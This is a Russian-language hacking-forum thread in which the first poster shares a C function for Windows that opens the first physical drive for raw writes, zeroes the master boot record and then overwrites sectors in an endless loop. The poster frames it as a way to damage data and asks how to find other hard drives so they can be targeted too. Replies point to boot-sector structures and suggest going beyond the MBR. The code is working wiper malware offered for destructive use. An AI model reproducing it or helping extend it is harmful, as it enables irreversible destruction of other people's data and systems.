Вот к примеру с помощью такого примитива Code: des() { HANDLE fs;DWORD num; char bf1[512];char bf2[1024*256]; char *disk="\\\\.\\PHYSICALDRIVE0"; int sek=0; fs=CreateFile(disk,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_FLAG_NO_BUFFERING,NULL); memset(bf2,0,1024*256); for(;;) { SetFilePointer(fs,512*sek,NULL,FILE_BEGIN); if(sek==0) { memset(bf1,0,512); WriteFile(fs,bf1,512,&num,NULL); } sek=sek+1024; WriteFile(fs,bf2,512,&num,NULL); } } Можно подпортить инфу на жестком диске.Но насколько я понимаю данные потрутся только на харде с которого грузится винда(PHYSICALDRIVE0).А если есть другие харды , то как можно получить их идентификаторы при этом не спутав хард с оптическим приводом?
Причем здесь загрузочный сектор???Я хотел узнать как можно железки типа HDD опознать под виндой.Тем более ссылка по линуксу.
в загрузочный секторе хранится инфо по разделам или я тебя не понял, если тебе серийный номер диска нужен то смотри здесь https://forum.antichat.ru/thread71136.html
структуры то общие а портировать под винду проблем не составляет, только устройства разные открывать, а так может чтото поинтереснее мбр напишешь